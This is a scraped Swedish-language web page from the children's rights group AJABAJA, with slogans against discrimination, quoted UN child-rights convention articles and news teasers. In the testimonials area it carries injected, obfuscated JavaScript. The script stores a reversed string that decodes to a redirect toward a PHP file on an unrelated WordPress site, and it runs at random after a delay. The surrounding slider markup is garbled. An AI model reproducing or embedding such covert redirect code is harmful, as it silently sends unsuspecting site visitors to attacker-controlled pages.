AJABAJA gör skillnad för barnen

Barnen utgör ca 15% av befolkningen i Sverige och 100 % av vår framtid!

Alldeles för många barn är utsatta för…
Kränkande behandling och diskriminering

– Alla barn har samma rättigheter och lika värde.
Ingen får diskrimineras.¹

– Barnets bästa ska komma i främsta rummet vid
alla beslut som rör barn.¹

– Varje barn har rätt att överleva och utvecklas.¹

– Varje barn har rätt att uttrycka sin mening och
höras i alla frågor som rör henne/honom.
Barnets åsikt ska beaktas i förhållande till
barnets ålder och mognad.¹


¹ – artiklarna 2,3,6 och 12 i Barnkonventionen
Här kan du läsa vad FN:s Barnkonvention säger!

Vad tycker våra användare

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andare” number=”100″ order_by=”rand” author_text_font_weight=”300″ show_navigation=”yes” navigation_style=”dark” auto_rotate_slides=”3″ animation_type=”fade_option” text_font_size=”19″ text_color=”#0a0a0a”]

Nyheter

Filmen om AJABAJA

Idag lanserar vi vår nya film om AJABAJA som vänder sig till företag och organisationer som vill ha en tydlig riktning i ert sociala hållbarhetsarbete. Som partner till oss bidrar du till barns hälsa och välmående. AJABAJA ökar kunskapen om kränkande behandling, diskriminering och trakasserier och därmed minskat utanförskap! Förskola,......

You cannot get through a single day without having an impact on the world around you. What you do makes a difference, and you have to decide what kind of difference you want to make. – Jane Goodall Primatologist, Ethologist, Anthropologist, United Nations Messenger Of......

Barnkonventionen

BARNKONVENTIONEN FN:s konvention om barnets rättigheter, eller barnkonventionen som den också kallas, innehåller bestämmelser om mänskliga rättigheter för barn. I barnkonventionens artikel 45 finns inskrivet att det är UNICEFs uppgift att kämpa för att barnkonventionen efterlevs. Det här uppdraget är vi mycket stolta över. Vi......